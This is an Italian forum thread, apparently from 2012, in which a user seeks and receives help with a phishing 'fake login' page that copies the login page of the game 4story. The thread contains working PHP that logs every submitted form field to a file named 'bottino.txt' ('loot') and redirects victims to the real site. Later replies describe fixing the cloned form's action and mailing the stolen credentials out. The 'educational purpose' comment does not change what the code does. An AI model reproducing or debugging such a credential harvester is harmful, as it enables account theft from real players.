• Regolamento Macrocategoria DEV
    Prima di aprire un topic nella Macrocategoria DEV, è bene leggerne il suo regolamento. Sei un'azienda o un hosting/provider? Qui sono anche contenute informazioni per collaborare con Sciax2 ed ottenere l'accredito nella nostra community!

Problema risolto Fake login

nonsaprei

Nuovo utente
Autore del topic
11 Gennaio 2012
4
0
Miglior risposta
0
Ragazzi ho creato il mio primo fake login del game 4story :
Perfavore, Entra oppure Registrati per vedere i Link!

il risultato a prima vista è ottimo, l'unico problema è che non mi invia i dati di log-in nel mio file "bottino.txt" .
Ho usato XAMPP e Notepad++ anche se nn credo c'entri qualcosa,solo che nn riesco a trovare l'errore nel codice.
IL FILE INDEX.HTML (cioè la sorgente ) L' HO COPIATO PARI PARI DAL SITO.
RIGUARDO IL SITO PHP IL CODICE è IL SEGUENTE:

<?php

/*****************************
Autore : ------- -----------
Script : Fakelogin 4story
CREATO A SCOPO DIDATTICO

*****************************/

header ('Location:
Perfavore, Entra oppure Registrati per vedere i Link!

$handle = fopen("bottino.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


Help
 
Riferimento: Fake login

Per forza, con la funzione header includi solamente il sito di 4story, ma la pagina di invio dei dati rimane quella del sito e non quella del tuo fake login.
 
Riferimento: Fake login

ho risolto.. avevo dimenticato di cambiare il sito nella pagina html nella sezione del log in ed ho risolto poi con la funzione mail invece della funzione file "bottino.txt" grz
 
Riferimento: Fake login

Per forza, con la funzione header includi solamente il sito di 4story, ma la pagina di invio dei dati rimane quella del sito e non quella del tuo fake login.

In realtà è un header location, quindi rimanda al sito di 4story, in più non avrebbe senso rimandare ad una pagina e poi eseguire delle azioni :emoji_relieved:
 
Riferimento: Fake login

ho risolto.. avevo dimenticato di cambiare il sito nella pagina html nella sezione del log in ed ho risolto poi con la funzione mail invece della funzione file "bottino.txt" grz

Data la risposta dell'autore, segnalo per problema risolto.